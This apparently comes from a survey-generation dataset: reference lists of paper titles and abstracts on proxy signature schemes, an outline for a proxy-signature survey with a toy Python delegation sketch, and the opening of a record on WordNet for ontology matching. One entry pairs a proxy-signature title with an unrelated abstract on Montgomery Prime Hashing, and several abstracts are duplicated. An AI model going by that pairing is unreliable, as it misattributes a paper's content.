signature scheme, and its application to a secure mobile agent, Shum and Wei’s privacy protected strong proxy signature scheme, and Park and Lee’s nominative proxy signature scheme, and show that all these proxy signature schemes are insecure against the original signer’s forgery. In other words, these schemes do not possess the unforgeability property which is a desired security requirement for a proxy signature scheme. --- paper_title: A practical (t, n) threshold proxy signature scheme based on the RSA cryptosystem paper_content: In a (t, n) threshold proxy signature scheme, the original signer delegates the power of signing messages to a designated proxy group of n members. Any t or more proxy signers of the group can cooperatively issue a proxy signature on behalf of the original signer, but (t - 1) or less proxy signers cannot. Previously, all of the proposed threshold proxy signature schemes have been based on the discrete logarithm problem and do not satisfy all proxy requirements. In this paper, we propose a practical, efficient, and secure (t, n) threshold proxy signature scheme based on the RSA cryptosystem. Our scheme satisfies all proxy requirements and uses only a simple Lagrange formula to share the proxy signature key. 
Furthermore, our scheme requires only 5 percent of the computational overhead and 8 percent of the communicational overhead required in Kim's scheme. --- paper_title: Security Analysis of Some Proxy Signatures paper_content: A proxy signature scheme allows an entity to delegate his/her signing capability to another entity in such a way that the latter can sign messages on behalf of the former. Such schemes have been suggested for use in a number of applications, particularly in distributed computing where delegation of rights is quite common. Followed by the first schemes introduced by Mambo, Usuda and Okamoto in 1996, a number of new schemes and improvements have been proposed. In this paper, we present a security analysis of four such schemes newly proposed in [14, 15]. By successfully identifying several interesting forgery attacks, we show that these four schemes -all are insecure. Consequently, the fully distributed proxy scheme in [11] is also insecure since it is based on the (insecure) LKK scheme [13, 14]. In addition, we point out the reasons why the security proofs provided in [14] are invalid. --- paper_title: ID-Based Proxy Signature Using Bilinear Pairings paper_content: Identity-based (ID-based) public key cryptosystem can be a good alternative for certificate-based public key setting, especially when efficient key management and moderate security are required. A proxy signature scheme permits an entity to delegate its signing rights to another entity. But to date, no ID-based proxy signature scheme with provable security has been proposed. In this paper, we formalize a notion of security for ID-based proxy signature schemes and propose a scheme based on the bilinear pairings. We show that the security of our scheme is tightly related to the computational Diffie-Hellman assumption in the random oracle model. --- paper_title: Verifiable Secret Sharing for General Access Structures, with Application to Fully Distributed Proxy Signatures paper_content: Secret sharing schemes are an essential part of distributed cryptographic systems. When dishonest participants are considered, then an appropriate tool are verifiable secret sharing schemes. Such schemes have been traditionally considered for a threshold scenario, in which all the participants play an equivalent role. In this work, we generalize some protocols dealing with verifiable secret sharing, in such a way that they run in a general distributed scenario for both the tolerated subsets of dishonest players and the subsets of honest players authorized to execute the different phases of the protocols. --- paper_title: Proxy and threshold one-time signatures paper_content: One-time signatures are an important and efficient authentication utility. Various schemes already exist for the classical one-way public-key cryptography. One-time signatures have not been sufficiently explored in the literature in the branch of society-oriented cryptography. Their particular properties make them suitable, as a potential cryptographic primitive, for broadcast communication and group-based applications. In this paper, we try to contribute to filling this gap by introducing several group-based one-time signature schemes of various versions: with proxy, with trusted party, and without trusted party. 
--- paper_title: Provably secure delegation-by-certification proxy signature schemes paper_content: In this paper, we first show that a previous proxy signature scheme by delegation with certificate is not provably secure under adaptive-chosen message attacks and adaptive-chosen warrant attacks. The scheme does not provide strong undeniability. Then we construct a proxy signature scheme by delegation with certificate based on a co-GDH group from a bilinear map. Our proxy signature scheme is existentially unforgeable against adaptive-chosen message attacks and adaptive-chosen warrant attacks in the random oracle model. We adopt a straight method of security reduction in which our scheme's security is reduced to the hardness of the computational co-Diffie-Hellman problem. The proposed signature scheme is the first secure delegation-by-certificate proxy signature based on co-GDH groups from bilinear maps under the formal security model in the random oracle model. --- paper_title: Efficient signature generation by smart cards paper_content: We present a new public-key signature scheme and a corresponding authentication scheme that are based on discrete logarithms in a subgroup of units in Z_p, where p is a sufficiently large prime, e.g., p ≈ 2^512. A key idea is to use for the base of the discrete logarithm an integer α in Z_p such that the order of α is a sufficiently large prime q, e.g., q ≈ 2^140. In this way we improve the ElGamal signature scheme in the speed of the procedures for the generation and the verification of signatures and also in the bit length of signatures. We present an efficient algorithm that preprocesses the exponentiation of a random residue modulo p. --- paper_title: Handbook of Applied Cryptography paper_content: From the Publisher: ::: A valuable reference for the novice as well as for the expert who needs a wider scope of coverage within the area of cryptography, this book provides easy and rapid access of information and includes more than 200 algorithms and protocols; more than 200 tables and figures; more than 1,000 numbered definitions, facts, examples, notes, and remarks; and over 1,250 significant references, including brief comments on each paper. --- paper_title: A forward-secure public-key encryption scheme paper_content: Cryptographic computations are often carried out on insecure devices for which the threat of key exposure represents a serious and realistic concern. In an effort to mitigate the damage caused by exposure of secret data (e.g., keys) stored on such devices, the paradigm of forward security was introduced. In a forward-secure scheme, secret keys are updated at regular periods of time; furthermore, exposure of a secret key corresponding to a given time period does not enable an adversary to "break" the scheme (in the appropriate sense) for any prior time period. A number of constructions of forward-secure digital signature schemes, key-exchange protocols, and symmetric-key schemes are known. ::: ::: We present the first constructions of a (non-interactive) forward-secure public-key encryption scheme. Our main construction achieves security against chosen plaintext attacks under the decisional bilinear Diffie-Hellman assumption in the standard model. It is practical, and all complexity parameters grow at most logarithmically with the total number of time periods. The scheme can also be extended to achieve security against chosen ciphertext attacks.
--- paper_title: New Directions in Cryptography paper_content: Two kinds of contemporary developments in cryptography are examined. Widening applications of teleprocessing have given rise to a need for new types of cryptographic systems, which minimize the need for secure key distribution channels and supply the equivalent of a written signature. This paper suggests ways to solve these currently open problems. It also discusses how the theories of communication and computation are beginning to provide the tools to solve cryptographic problems of long standing. --- paper_title: A digital signature scheme secure against adaptive chosen-message attacks paper_content: We present a digital signature scheme based on the computational difficulty of integer factorization.The scheme possesses the novel property of being robust against an adaptive chosen-message attack: an adversary who receives signatures for messages of his choice (where each message may be chosen in a way that depends on the signatures of previously chosen messages) cannot later forge the signature of even a single additional message. This may be somewhat surprising, since in the folklore the properties of having forgery being equivalent to factoring and being invulnerable to an adaptive chosen-message attack were considered to be contradictory.More generally, we show how to construct a signature scheme with such properties based on the existence of a “claw-free” pair of permutations—a potentially weaker assumption than the intractibility of integer factorization.The new scheme is potentially practical: signing and verifying signatures are reasonably fast, and signatures are compact. --- paper_title: Reducing elliptic curve logarithms to logarithms in a finite field paper_content: Elliptic curve cryptosystems have the potential to provide relatively small block size, high-security public key schemes that can be efficiently implemented. As with other known public key schemes, such as RSA and discrete exponentiation in a finite field, some care must be exercised when selecting the parameters involved, in this case the elliptic curve and the underlying field. Specific classes of curves that give little or no advantage over previously known schemes are discussed. The main result of the paper is to demonstrate the reduction of the elliptic curve logarithm problem to the logarithm problem in the multiplicative group of an extension of the underlying finite field. For the class of supersingular elliptic curves, the reduction takes probabilistic polynomial time, thus providing a probabilistic subexponential time algorithm for the former problem. > --- paper_title: Short Signatures from the Weil Pairing paper_content: We introduce a short signature scheme based on the Computational Diffie–Hellman assumption on certain elliptic and hyperelliptic curves. For standard security parameters, the signature length is about half that of a DSA signature with a similar level of security. Our short signature scheme is designed for systems where signatures are typed in by a human or are sent over a low-bandwidth channel. We survey a number of properties of our signature scheme such as signature aggregation and batch verification. 
--- paper_title: A Remark Concerning m-Divisibility and the Discrete Logarithm in the Divisor Class Group of Curves paper_content: The aim of this paper is to show that the computation of the discrete logarithm in the m-torsion part of the divisor class group of a curve X over a finite field k0 (with char(k0) prime to m), or over a local field k with residue field k0, can be reduced to the computation of the discrete logarithm in k0(ζm)*. For this purpose we use a variant of the (tame) Tate pairing for Abelian varieties over local fields. In the same way the problem of determining all linear combinations of a finite set of elements in the divisor class group of a curve over k or k0 which are divisible by m is reduced to the computation of the discrete logarithm in k0(ζm)*. --- paper_title: Identity-based encryption from the Weil pairing paper_content: We propose a fully functional identity-based encryption (IBE) scheme. The scheme has chosen ciphertext security in the random oracle model assuming a variant of the computational Diffie-Hellman problem. Our system is based on bilinear maps between groups. The Weil pairing on elliptic curves is an example of such a map. We give precise definitions for secure IBE schemes and give several applications for such systems. --- paper_title: An Identity Based Encryption Scheme Based on Quadratic Residues paper_content: We present a novel public key cryptosystem in which the public key of a subscriber can be chosen to be a publicly known value, such as his identity. We discuss the security of the proposed scheme, and show that this is related to the difficulty of solving the quadratic residuosity problem. --- paper_title: A method for obtaining digital signatures and public-key cryptosystems paper_content: An encryption method is presented with the novel property that publicly revealing an encryption key does not thereby reveal the corresponding decryption key. This has two important consequences: (1) Couriers or other secure means are not needed to transmit keys, since a message can be enciphered using an encryption key publicly revealed by the intended recipient. Only he can decipher the message, since only he knows the corresponding decryption key. (2) A message can be “signed” using a privately held decryption key. Anyone can verify this signature using the corresponding publicly revealed encryption key. Signatures cannot be forged, and a signer cannot later deny the validity of his signature. This has obvious applications in “electronic mail” and “electronic funds transfer” systems. A message is encrypted by representing it as a number M, raising M to a publicly specified power e, and then taking the remainder when the result is divided by the publicly specified product, n, of two large secret prime numbers p and q. Decryption is similar; only a different, secret, power d is used, where e * d ≡ 1 (mod (p - 1) * (q - 1)). The security of the system rests in part on the difficulty of factoring the published divisor, n. --- paper_title: Threshold proxy signatures paper_content: A (t, n) threshold proxy signature scheme allows t or more proxy signers from a designated group of n proxy signers to sign messages on behalf of an original signer. The authors review both Zhang's threshold proxy signature scheme and Kim's threshold proxy signature scheme. They show that Zhang's scheme suffers from some weaknesses and Kim's scheme suffers from a disadvantage. 
Based on Zhang's scheme, they propose a new threshold proxy signature scheme to defeat the weaknesses of Zhang's scheme and the disadvantage of Kim's scheme. --- paper_title: Repudiation of Cheating and Non-repudiation of Zhang's Proxy Signature Schemes paper_content: The paper discusses the correctness of Lee, Hwang and Wang's comments on on Zhang's proxy signature schemes. In particular, it is shown that the cheating attack proposed by Lee, Hwang and Wang can be detected by the owner of the signature scheme. It is argued that considering the context in which proxy signatures are used, the attack is not a security problem. The work is concluded by a discussion about the non-repudiation controversy incorrectly observed by Lee, Hwang and Wang. --- paper_title: Robust threshold DSS signatures paper_content: We present threshold DSS (Digital Signature Standard) signatures where the power to sign is shared by n players such that for a given parameter t < n/2 any subset of 2t + 1 signers can collaborate to produce a valid DSS signature on any given message, but no subset of t corrupted players can forge a signature (in particular, cannot learn the signature key). In addition, we present a robust threshold DSS scheme that can also tolerate n/3 players who refuse to participate in the signature protocol. We can also endure n/4 maliciously faulty players that generate incorrect partial signatures at the time of signature computation. This results in a highly secure and resilient DSS signature system applicable to the protection of the secret signature key, the prevention of forgery, and increased system availability. ::: ::: Our results significantly improve over a recent result by Langford from CRYPTO'95 that presents threshold DSS signatures which can stand much smaller subsets of corrupted players, namely, t ≅ √n, and do not enjoy the robustness property. As in thc case of Langford's result, our schemes require no trusted party. Our techniques apply to other threshold ElGamal-like signatures as well. We prove the security of our schemes solely based on the hardness of forging a regular DSS signature. --- paper_title: Threshold proxy signatures paper_content: A (t, n) threshold proxy signature scheme allows t or more proxy signers from a designated group of n proxy signers to sign messages on behalf of an original signer. The authors review both Zhang's threshold proxy signature scheme and Kim's threshold proxy signature scheme. They show that Zhang's scheme suffers from some weaknesses and Kim's scheme suffers from a disadvantage. Based on Zhang's scheme, they propose a new threshold proxy signature scheme to defeat the weaknesses of Zhang's scheme and the disadvantage of Kim's scheme. --- paper_title: Threshold Proxy Signature Schemes paper_content: Delegation of rights is a common practice in the real world. Proxy signature schemes have been invented to delegate signing capability efficiently and transparently. In this paper, we present a new nonrepudiable proxy signature scheme. Nonrepudiation means the signature signers, both original and proxy signers, cannot falsely deny later that he generated a signature. In practice, it is important and, sometimes, necessary to have the ability to know who is the actual signer of a proxy signature for internal auditing purpose or when there is abuse of signing capability. The new nonrepudiable proxy signature scheme also has other desirable properties, such as proxy signature key generation and updating using insecure channels. 
We also show how to construct threshold proxy signature schemes with an example. Threshold signatures are motivated both by the need that arises in some organizations to have a group of employees agree on a given message (or a document) before signing it, as well as by the need to protect signature keys from the attack of internal and external adversaries. Our approach can also be applied to other ElGamal-like proxy signature schemes. --- paper_title: On Zhang's Nonrepudiable Proxy Signature Schemes paper_content: In 1997, Zhang proposed two new nonrepudiable proxy signature schemes to delegate signing capability. Both schemes claimed to have a property of knowing that a proxy signature is generated by either the original signer or a proxy signer. However, this paper will show that Zhang's second scheme fails to possess this property. Moreover, we shall show that the proxy signer can cheat to get the original signer's signature, if Zhang's scheme is based on some variants of ElGamal-type signature schemes. We modify Zhang's nonrepudiable proxy signature scheme to avoid the above attacks. The modified scheme also investigates a new feature for the original signer to limit the delegation time to a certain period. --- paper_title: An analysis of proxy signatures: is a secure channel necessary? paper_content: Montgomery Prime Hashing (MPH) is a scheme for message authentication based on universal hashing.I n MPH, roughly speaking, the hash value is computed as the Montgomery residue of the message with respect to a secret modulus.The modulus value is structured in a way that allows fast, compact implementations in both hardware and software.The set of allowed modulus values is large, and as a result, MPH achieves good, provable security. ::: ::: MPH performance is comparable to that of other high-speed schemes such as MMH. An advantage of MPH is that the secret key (i.e., the modulus) is small, typically 128-256 bits, while in MMH the secret key is typically much larger.I n applications where MMH key length is problematic, MPH may be an attractive alternative. --- paper_title: Distributed provers with applications to undeniable signatures paper_content: This paper introduces distributed prover protocols. Such a protocol is a proof system in which a polynomially bounded prover is replaced by many provers each having partial information about the witness owned by the original prover. As an application of this concept, it is shown how the signer of undeniable signatures can distribute part of his secret key to n agents such that any k of these can verify a signature. This facility is useful in most applications of undeniable signatures, and as the proposed protocols are practical, the results in this paper makes undeniable signatures more useful. The first part of the paper describes a method for verifiable secret sharing, which allows non-interactive verification of the shares and is as secure as the Shamir secret sharing scheme in the proposed applications. --- paper_title: Improvement of threshold proxy signature scheme paper_content: Abstract A (t, n) threshold proxy signature scheme allows any t or more proxy signers to cooperatively sign messages on behalf of an original signer, but t−1 or fewer proxy signers cannot. Sun et al. proposed a new (t, n) threshold proxy signature scheme based on Zhang's threshold proxy signature scheme. Recently, Hsu et al. pointed out that Sun's scheme suffered from a drawback and proposed an improvement to counter it. 
However, the author of this paper shows that both Sun's scheme and Hsu's improvement are not secure against coalition attack. Some t or more malicious proxy signers can conspire together against the original signer. Finally, we propose a new improvement to counter this attack, the proxy generation and the signature computation of which is more efficient than those of Sun's scheme and Hsu's improvement. The main advantage of the new improvement is traceability, by which the original signer can identify the actual signers that are anonymous to outsiders. --- paper_title: Threshold Proxy Signature Schemes paper_content: Delegation of rights is a common practice in the real world. Proxy signature schemes have been invented to delegate signing capability efficiently and transparently. In this paper, we present a new nonrepudiable proxy signature scheme. Nonrepudiation means the signature signers, both original and proxy signers, cannot falsely deny later that he generated a signature. In practice, it is important and, sometimes, necessary to have the ability to know who is the actual signer of a proxy signature for internal auditing purpose or when there is abuse of signing capability. The new nonrepudiable proxy signature scheme also has other desirable properties, such as proxy signature key generation and updating using insecure channels. We also show how to construct threshold proxy signature schemes with an example. Threshold signatures are motivated both by the need that arises in some organizations to have a group of employees agree on a given message (or a document) before signing it, as well as by the need to protect signature keys from the attack of internal and external adversaries. Our approach can also be applied to other ElGamal-like proxy signature schemes. --- paper_title: Security Analysis of Some Proxy Signatures paper_content: A proxy signature scheme allows an entity to delegate his/her signing capability to another entity in such a way that the latter can sign messages on behalf of the former. Such schemes have been suggested for use in a number of applications, particularly in distributed computing where delegation of rights is quite common. Followed by the first schemes introduced by Mambo, Usuda and Okamoto in 1996, a number of new schemes and improvements have been proposed. In this paper, we present a security analysis of four such schemes newly proposed in [14, 15]. By successfully identifying several interesting forgery attacks, we show that these four schemes -all are insecure. Consequently, the fully distributed proxy scheme in [11] is also insecure since it is based on the (insecure) LKK scheme [13, 14]. In addition, we point out the reasons why the security proofs provided in [14] are invalid. --- paper_title: Security Analysis of Some Proxy Signatures paper_content: A proxy signature scheme allows an entity to delegate his/her signing capability to another entity in such a way that the latter can sign messages on behalf of the former. Such schemes have been suggested for use in a number of applications, particularly in distributed computing where delegation of rights is quite common. Followed by the first schemes introduced by Mambo, Usuda and Okamoto in 1996, a number of new schemes and improvements have been proposed. In this paper, we present a security analysis of four such schemes newly proposed in [14, 15]. By successfully identifying several interesting forgery attacks, we show that these four schemes -all are insecure. 
Consequently, the fully distributed proxy scheme in [11] is also insecure since it is based on the (insecure) LKK scheme [13, 14]. In addition, we point out the reasons why the security proofs provided in [14] are invalid. --- paper_title: Proxy signatures, Revisited paper_content: Proxy signatures, introduced by Mambo, Usuda and Okamoto allow a designated person to sign on behalf of an original signer. This paper first presents two new types of digital proxy signatures called partial delegation with warrant and threshold delegation. Proxy signatures for partial delegation with warrant combines the benefit of Mambo's partial delegation and Neuman's delegation by warrant, and then in threshold delegation the proxy signer's power to sign messages is shared. Moreover, we also propose straightforward and concrete proxy signature schemes satisfying our conditions. --- paper_title: Proxy signatures, Revisited paper_content: Proxy signatures, introduced by Mambo, Usuda and Okamoto allow a designated person to sign on behalf of an original signer. This paper first presents two new types of digital proxy signatures called partial delegation with warrant and threshold delegation. Proxy signatures for partial delegation with warrant combines the benefit of Mambo's partial delegation and Neuman's delegation by warrant, and then in threshold delegation the proxy signer's power to sign messages is shared. Moreover, we also propose straightforward and concrete proxy signature schemes satisfying our conditions. --- paper_title: Proxy and threshold one-time signatures paper_content: One-time signatures are an important and efficient authentication utility. Various schemes already exist for the classical one-way public-key cryptography. One-time signatures have not been sufficiently explored in the literature in the branch of society-oriented cryptography. Their particular properties make them suitable, as a potential cryptographic primitive, for broadcast communication and group-based applications. In this paper, we try to contribute to filling this gap by introducing several group-based one-time signature schemes of various versions: with proxy, with trusted party, and without trusted party. --- paper_title: New Proxy Signature, Proxy Blind Signature and Proxy Ring Signature Schemes from Bilinear Pairings paper_content: Proxy signatures are very useful tools when one needs to delegate his/her signing capability to other party. After Mambo et al.’s first scheme was announced, many proxy signature schemes and various types of proxy signature schemes have been proposed. Due to the various applications of the bilinear pairings in cryptography, there are many IDbased signature schemes have been proposed. In this paper, we address that it is easy to design proxy signature and proxy blind signature from the conventional ID-based signature schemes using bilinear pairings, and give some concrete schemes based on existed ID-based signature schemes. At the same time, we introduce a new type of proxy signature – proxy ring signature, and propose the first proxy ring signature scheme based on an existed ID-based ring signature scheme. --- paper_title: A Paradoxical Indentity-Based Signature Scheme Resulting from Zero-Knowledge paper_content: At EUROCRYPT'88, we introduced an interactive zero-knowledge protocol (Guillou and Quisquater [13]) fitted to the authentication of tamper-resistant devices (e.g. 
smart cards, Guillou and Ugon [14]).Each security device stores its secret authentication number, an RSA-like signature computed by an authority from the device identity. Any transaction between a tamper-resistant security device and a verifier is limited to a unique interaction: the device sends its identity and a random test number, then the verifier tells a random large question; and finally the device answers by a witness number. The transaction is successful when the test number is reconstructed from the witness number, the question and the identity according to numbers published by the authority and rules of redundancy possibly standardized.This protocol allows a cooperation between users in such a way that a group of cooperative users looks like a new entity, having a shadowed identity the product of the individual shadowed identities, while each member reveals nothing about its secret.In another scenario, the secret is partitioned between distinct devices sharing the same identity. A group of cooperative users looks like a unique user having a larger public exponent which is the greater common multiple of each individual exponent.In this paper, additional features are introduced in order to provide: firstly, a mutual interactive authentication of both communicating entities and previously exchanged messages, and, secondly, a digital signature of messages, with a non-interactive zero-knowledge protocol. The problem of multiple signature is solved here in a very smart way due to the possibilities of cooperation between users.The only secret key is the factors of the composite number chosen by the authority delivering one authentication number to each smart card. This key is not known by the user. At the user level, such a scheme may be considered as a keyless identity-based integrity scheme. This integrity has anew and important property: it cannot be misused, i.e. derived into a confidentiality scheme. --- paper_title: Efficient proxy multisignature schemes based on the elliptic curve cryptosystem paper_content: For improving proxy-signature research, Sun [5] attempted to resolve problems related to defective security in the scheme of Yi [3]. However, both Yi and Sun's schemes involve a significant number of exponential operations to verify the proxy signature. Accordingly, an improvement is proposed here to change the exponential operations into elliptic curve multiplicative ones. As proposed by both Koblitz [6-7] and Miller [8] in 1985, the elliptic curve is used in developing the cryptosystems. The elliptic curve cryptosystem can achieve a level of security equal to that of RSA or DSA but has a lower computational overhead and a smaller key size than both of these. Therefore, it is used in Sun's schemes to improve their efficiency. --- paper_title: Design of time-stamped proxy signatures with traceable receivers paper_content: A proxy signature scheme is a method which allows an original signer to delegate his signing power to a proxy signer. Most proxy signature schemes use a warrant appearing in the signature verification equation to declare the valid delegation period. However, the declaration in the warrant is useless because no-one can know the exact time when the proxy signer signed a message. To avoid the proxy signer abusing the signing capability, the original signer may hope to know the identity of who received the proxy signature from the proxy signer. 
Recently Sun and Chen proposed the concept of time-stamped proxy signatures with traceable receivers to solve these two problems. A time-stamped proxy signature scheme with traceable receivers is a proxy signature scheme which can ascertain whether a proxy signature is created during the delegation period, and can trace who actually received the proxy signatures from the proxy signer. The author shows that Sun and Chen's scheme suffers from weaknesses and consequently proposes a new time-stamped proxy signature scheme which doesn't suffer from the same weaknesses. ---
Title: Algorithms and Approaches of Proxy Signature: A Survey
Section 1: Introduction
Description 1: Provide an introduction to digital signatures, evolution of proxy signatures, and various types of delegations in proxy signatures.
Section 2: Discrete Logarithm Problem
Description 2: Discuss the discrete logarithm problem, its relevance in cryptography, and its application in signature schemes like Schnorr's signature scheme.
Section 3: Bilinear Pairings
Description 3: Explain bilinear pairings, their properties, computational problems related to them, and their use in cryptographic protocols like Hess's signature scheme.
Section 4: Integer Factorization Problem
Description 4: Describe the integer factorization problem, its significance in cryptography, and details of RSA-based signature schemes.
Section 5: Security Properties of a Proxy Signature
Description 5: Outline the desirable security properties that proxy signatures must possess, such as strong unforgeability, identifiability, undeniability, verifiability, distinguishability, secrecy, and prevention of misuse.
Section 6: Classification of Proxy Signature
Description 6: Classify proxy signatures based on the nature of delegation capability into proxy-unprotected, proxy-protected, and threshold notions.
Section 7: Models of Proxy Signature
Description 7: Categorize existing proxy signature schemes based on their security assumptions into DLP-based, RSA-based, and pairing-based models.
Section 8: DLP-based Proxy Signature
Description 8: Review proxy signatures where the security relies on the discrete logarithm problem, detailing their procedures and security (a toy delegation sketch follows this outline).
Section 9: RSA-based Proxy Signature
Description 9: Discuss proxy signatures that depend on the RSA algorithm, outlining their key generation, delegation capability, and signature verification processes.
Section 10: ECDSA-based Proxy Signature
Description 10: Explore proxy signatures based on the elliptic curve digital signature algorithm, addressing the reduction of computational overheads and multi-signature schemes.
Section 11: Pairing-based Proxy Signature
Description 11: Examine proxy signatures utilizing bilinear pairings, detailing the generation and verification of proxy signatures and addressing their security concerns.
Section 12: Notable Proxy Signature Schemes
Description 12: Review contributions from various researchers, highlight notable proxy signature schemes, and discuss their strengths and weaknesses.
Section 13: Conclusion
Description 13: Summarize the survey, present the overall observations, and suggest potential areas for future research in proxy signature schemes.
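As a concrete illustration of the DLP-based delegation mechanism covered in Section 8, the following is a minimal Python sketch of a Mambo-Usuda-Okamoto-style partial-delegation key and its verification. It is only a sketch under stated assumptions: the tiny parameters, the variable names (p, g, s, y, k, K, sigma), and the omission of warrants and hashing are illustrative choices, not the construction of any single scheme in the reference list above.

# Toy sketch of partial delegation in the Mambo-Usuda-Okamoto style.
# NOT secure: tiny parameters, no warrant, no hashing; illustration only.
import random

p = 467                 # small prime modulus (toy value)
g = 2                   # base; any unit mod p satisfies the identity checked below

# Original signer's key pair: secret s, public y = g^s mod p
s = random.randrange(2, p - 1)
y = pow(g, s, p)

# Delegation: pick random k, publish K = g^k, and hand sigma = s + k*K (mod p-1)
# to the proxy signer as the proxy signing key.
k = random.randrange(2, p - 1)
K = pow(g, k, p)
sigma = (s + k * K) % (p - 1)

# The proxy (and any verifier) checks the delegation:  g^sigma == y * K^K (mod p)
assert pow(g, sigma, p) == (y * pow(K, K, p)) % p
print("delegation verified; derived proxy public key:", (y * pow(K, K, p)) % p)

In the schemes this survey reviews, the proxy signer would then sign with sigma under an ElGamal- or Schnorr-type scheme, so that verification uses the derived public key y * K^K rather than the original signer's key.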
A Survey of Exploiting WordNet in Ontology Matching
8
--- paper_title: Using Corpus Statistics And WordNet Relations For Sense Identification paper_content: Corpus-based approaches to word sense identification have flexibility and generality but suffer from a knowledge acquisition bottleneck. We show how knowledge-based techniques can be used to open the bottleneck by automatically locating training corpora. We describe a statistical classifier that combines topical context with local cues to identify a word sense. The classifier is used to disambiguate a noun, a verb, and an adjective. A knowledge base in the form of WordNet's lexical relations is used to automatically locate training examples in a general text corpus. Test results are compared with those from manually tagged training examples. --- paper_title: Determining Semantic Similarity among Entity Classes from Different Ontologies paper_content: Semantic similarity measures play an important role in information retrieval and information integration. Traditional approaches to modeling semantic similarity compute the semantic distance between definitions within a single ontology. This single ontology is either a domain-independent ontology or the result of the integration of existing ontologies. We present an approach to computing semantic similarity that relaxes the requirement of a single ontology and accounts for differences in the levels of explicitness and formalization of the different ontology specifications. A similarity function determines similar entity classes by using a matching process over synonym sets, semantic neighborhoods, and distinguishing features that are classified into parts, functions, and attributes. Experimental results with different ontologies indicate that the model gives good results when ontologies have complete and detailed representations of entity classes. While the combination of word matching and semantic neighborhood matching is adequate for detecting equivalent entity classes, feature matching allows us to discriminate among similar, but not necessarily equivalent entity classes. --- paper_title: Semantic Similarity Based on Corpus Statistics and Lexical Taxonomy paper_content: This paper presents a new approach for measuring semantic similarity/distance between words and concepts. It combines a lexical taxonomy structure with corpus statistical information so that the semantic distance between nodes in the semantic space constructed by the taxonomy can be better quantified with the computational evidence derived from a distributional analysis of corpus data. Specifically, the proposed measure is a combined approach that inherits the edge-based approach of the edge counting scheme, which is then enhanced by the node-based approach of the information content calculation. When tested on a common data set of word pair similarity ratings, the proposed approach outperforms other computational models. It gives the highest correlation value (r = 0.828) with a benchmark based on human similarity judgements, whereas an upper bound (r = 0.885) is observed when human subjects replicate the same task. --- paper_title: Semantic Enrichment for Ontology Mapping paper_content: In this paper, we present a heuristic mapping method and a prototype mapping system that support the process of semi-automatic ontology mapping for the purpose of improving semantic interoperability in heterogeneous systems. The approach is based on the idea of semantic enrichment, i.e. 
using instance information of the ontology to enrich the original ontology and calculate similarities between concepts in two ontologies. The functional settings for the mapping system are discussed and the evaluation of the prototype implementation of the approach is reported. --- paper_title: Verb Semantics And Lexical Selection paper_content: This paper will focus on the semantic representation of verbs in computer systems and its impact on lexical selection problems in machine translation (MT). Two groups of English and Chinese verbs are examined to show that lexical selection must be based on interpretation of the sentences as well as selection restrictions placed on the verb arguments. A novel representation scheme is suggested, and is compared to representations with selection restrictions used in transfer-based MT. We see our approach as closely aligned with knowledge-based MT approaches (KBMT), and as a separate component that could be incorporated into existing systems. Examples and experimental results will show that, using this scheme, inexact matches can achieve correct lexical selection. --- paper_title: Using Information Content to Evaluate Semantic Similarity in a Taxonomy paper_content: This paper presents a new measure of semantic similarity in an IS-A taxonomy, based on the notion of information content. Experimental evaluation suggests that the measure performs encouragingly well (a correlation of r = 0.79 with a benchmark set of human similarity judgments, with an upper bound of r = 0.90 for human subjects performing the same task), and significantly better than the traditional edge counting approach (r = 0.66). --- paper_title: Semantic Similarity Based on Corpus Statistics and Lexical Taxonomy paper_content: This paper presents a new approach for measuring semantic similarity/distance between words and concepts. It combines a lexical taxonomy structure with corpus statistical information so that the semantic distance between nodes in the semantic space constructed by the taxonomy can be better quantified with the computational evidence derived from a distributional analysis of corpus data. Specifically, the proposed measure is a combined approach that inherits the edge-based approach of the edge counting scheme, which is then enhanced by the node-based approach of the information content calculation. When tested on a common data set of word pair similarity ratings, the proposed approach outperforms other computational models. It gives the highest correlation value (r = 0.828) with a benchmark based on human similarity judgements, whereas an upper bound (r = 0.885) is observed when human subjects replicate the same task. --- paper_title: Determining Semantic Similarity among Entity Classes from Different Ontologies paper_content: Semantic similarity measures play an important role in information retrieval and information integration. Traditional approaches to modeling semantic similarity compute the semantic distance between definitions within a single ontology. This single ontology is either a domain-independent ontology or the result of the integration of existing ontologies. We present an approach to computing semantic similarity that relaxes the requirement of a single ontology and accounts for differences in the levels of explicitness and formalization of the different ontology specifications. 
A similarity function determines similar entity classes by using a matching process over synonym sets, semantic neighborhoods, and distinguishing features that are classified into parts, functions, and attributes. Experimental results with different ontologies indicate that the model gives good results when ontologies have complete and detailed representations of entity classes. While the combination of word matching and semantic neighborhood matching is adequate for detecting equivalent entity classes, feature matching allows us to discriminate among similar, but not necessarily equivalent entity classes. --- paper_title: Using Corpus Statistics And WordNet Relations For Sense Identification paper_content: Corpus-based approaches to word sense identification have flexibility and generality but suffer from a knowledge acquisition bottleneck. We show how knowledge-based techniques can be used to open the bottleneck by automatically locating training corpora. We describe a statistical classifier that combines topical context with local cues to identify a word sense. The classifier is used to disambiguate a noun, a verb, and an adjective. A knowledge base in the form of WordNet's lexical relations is used to automatically locate training examples in a general text corpus. Test results are compared with those from manually tagged training examples. --- paper_title: Determining Semantic Similarity among Entity Classes from Different Ontologies paper_content: Semantic similarity measures play an important role in information retrieval and information integration. Traditional approaches to modeling semantic similarity compute the semantic distance between definitions within a single ontology. This single ontology is either a domain-independent ontology or the result of the integration of existing ontologies. We present an approach to computing semantic similarity that relaxes the requirement of a single ontology and accounts for differences in the levels of explicitness and formalization of the different ontology specifications. A similarity function determines similar entity classes by using a matching process over synonym sets, semantic neighborhoods, and distinguishing features that are classified into parts, functions, and attributes. Experimental results with different ontologies indicate that the model gives good results when ontologies have complete and detailed representations of entity classes. While the combination of word matching and semantic neighborhood matching is adequate for detecting equivalent entity classes, feature matching allows us to discriminate among similar, but not necessarily equivalent entity classes. --- paper_title: Finding Out About: A Cognitive Perspective on Search Engine Technology and the WWW paper_content: The World Wide Web is rapidly filling with more text than anyone could have imagined a short time ago. However, the task of determining which data is relevant has become appreciably harder. In this original new work Richard Belew brings a cognitive science perspective to the study of information as a computer science discipline. He introduces the idea of Finding Out About (FOA), the process of actively seeking out information relevant to a topic of interest. Belew describes all facets of FOA, ranging from creating a good characterization of what the user seeks to evaluating the successful performance of search engines. His volume clearly shows how to build many of the tools that are useful for searching collections of text and other media. 
While computer scientists make up the book's primary audience, Belew skillfully presents technical details in a manner that makes important themes accessible to readers more comfortable with words than equations. (A CD is included with the text.)
--- paper_title: Semantic Enrichment for Ontology Mapping
